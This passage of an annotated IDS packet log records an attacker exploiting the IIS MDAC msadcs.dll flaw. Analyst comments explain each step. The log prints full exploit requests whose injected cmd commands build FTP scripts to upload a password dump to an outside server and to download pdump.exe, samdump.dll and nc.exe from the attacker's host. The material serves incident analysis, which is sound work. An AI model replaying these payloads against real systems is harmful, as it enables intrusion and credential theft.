=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.314214 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44714 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E94 Ack: 0x2CB63441 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.318867 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33399 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB63441 Ack: 0x2D782EBA Win: 0x2130 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session terminates with nothing downloaded
[**] FTP control channel [**]
02/04-05:33:35.366953 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44715 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2D782EBA Ack: 0x2CB63447 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to run pdump.exe and redirect its output into the file 'new.pass'
!@# Since pdump.exe never downloaded this fails; cmd.exe still creates an empty new.pass, because the redirect is opened before the command runs
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:51.024741 213.116.251.162:1793 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11215 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x95FDA7E9 Ack: 0x2CB67169 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .n.e.w...p.a.s.s.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to begin a new FTP script called ftpcom2
!@# The purpose of this script is to upload the file 'new.pass' to nether.net
!@# Note the third command below reads 'cmd /c put new.pass >> ftpcom2' with no echo: cmd.exe has no 'put' command, so that line never makes it into the script
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:01.106135 213.116.251.162:1795 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11227 IpLen:20 DgmLen:761 DF
***AP*** Seq: 0x9625AE88 Ack: 0x2CB698E2 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 567..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 358..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.2.".).|.'....
...d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r
. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\
.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!RO
X!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:08.113472 213.116.251.162:1797 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11238 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x9641CA4E Ack: 0x2CB6B430 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.2.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11249 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0x965E643C Ack: 0x2CB6D00A Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.u.t. .n.e.w...p.a.s.s. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:22.322873 213.116.251.162:1801 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11260 IpLen:20 DgmLen:747 DF
***AP*** Seq: 0x967B00EF Ack: 0x2CB6EBC6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 553..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 344..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.2.".).|.'.......d.r.i.v.e.r
.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b
.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t
.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!-
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to start a scripted FTP session with the new script file (ftpcom2)
!@# Again uses the -n switch to suppress auto-login
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:29.400851 213.116.251.162:1803 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11271 IpLen:20 DgmLen:771 DF
***AP*** Seq: 0x9697470F Ack: 0x2CB7076E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 577..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 368..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.2. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t."
.).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D
.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p
.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;..
.--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.041264 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44720 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x361B134A Ack: 0x2CB70BAB Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.048140 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49527 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB70BAB Ack: 0x361B1380 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.101821 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44722 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x361B1380 Ack: 0x2CB70BB9 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.107508 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:49783 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB70BB9 Ack: 0x361B13A4 Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP login fails again with the same credentials
!@# Note there is no STOR for new.pass: the 'put' line never made it into ftpcom2, so the session goes straight to QUIT
!@# When nothing shows up on the FTP server, the intruder will know something is wrong
[**] FTP control channel [**]
02/04-05:34:30.163799 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44723 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x361B13A4 Ack: 0x2CB70BCA Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.169909 172.16.1.106:3138 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:50039 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CB70BCA Ack: 0x361B13BA Win: 0x21C8 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:30.216281 204.42.253.18:21 -> 172.16.1.106:3138
TCP TTL:242 TOS:0x0 ID:44724 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x361B13BA Ack: 0x2CB70BD0 Win: 0x832C TcpLen: 20
221 Goodbye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to open an FTP connection to his own machine (the same address the HTTP attacks come from)
!@# This would prove that the victim CAN make outbound FTP connections. With no script and no -n the client would wait for a username it can never get; the intruder only needs to see the connection arrive at his own server
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:34:47.612437 213.116.251.162:1808 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11326 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x96E03E47 Ack: 0x2CB74E64 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .2.1.3...1.1.6...2.5.1...1.6.2.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:34:48.747703 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11332 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x96E52E89 Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Interesting FTP Banner
[**] FTP control channel [**]
02/04-05:34:49.294990 213.116.251.162:21 -> 172.16.1.106:3139
TCP TTL:111 TOS:0x0 ID:11333 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x96E52EBB Ack: 0x2CB7522F Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the MDAC vulnerability to start a new FTP script pointing at his/her own FTP server; the single '>' overwrites the file 'ftpcom'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:30.010659 213.116.251.162:1812 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11353 IpLen:20 DgmLen:775 DF
***AP*** Seq: 0x9868B053 Ack: 0x2CB8DE58 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 581..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 372..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .o.p.e.n. .2.1.3...1.1.6...2.5.1...1.6.2. .>. .f.t.p.c.o
.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s
. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e
.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b
.;...--!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Adds the username to the FTP script, but with '>' rather than '>>', so the whole file is overwritten and the 'open 213.116.251.162' line is lost. Also note the bare 'johna2k' without the 'user' keyword.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:37.316228 213.116.251.162:1814 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11365 IpLen:20 DgmLen:749 DF
***AP*** Seq: 0x988652BC Ack: 0x2CB8FAFA Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 555..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 346..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e
.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d
.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u
.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD
!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:44.409331 213.116.251.162:1816 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11376 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x98A2F1C0 Ack: 0x2CB916AC Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# This script is designed to grab the toolkit
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:36:53.648139 213.116.251.162:1821 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11431 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x98C4BF01 Ack: 0x2CB93580 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:01.033430 213.116.251.162:1825 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11482 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x98E8BAF1 Ack: 0x2CB95788 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:08.382549 213.116.251.162:1827 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11493 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x99063709 Ack: 0x2CB9743F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:15.487857 213.116.251.162:1829 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11504 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x9922916D Ack: 0x2CB9900F Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC exploit to start FTP client with 'ftpcom' script
!@# Since the open command was overwritten, the script does nothing
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:37:22.618538 213.116.251.162:1832 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11523 IpLen:20 DgmLen:733 DF
***AP*** Seq: 0x993FB647 Ack: 0x2CB9ABFD Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 539..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 330..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o
.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=
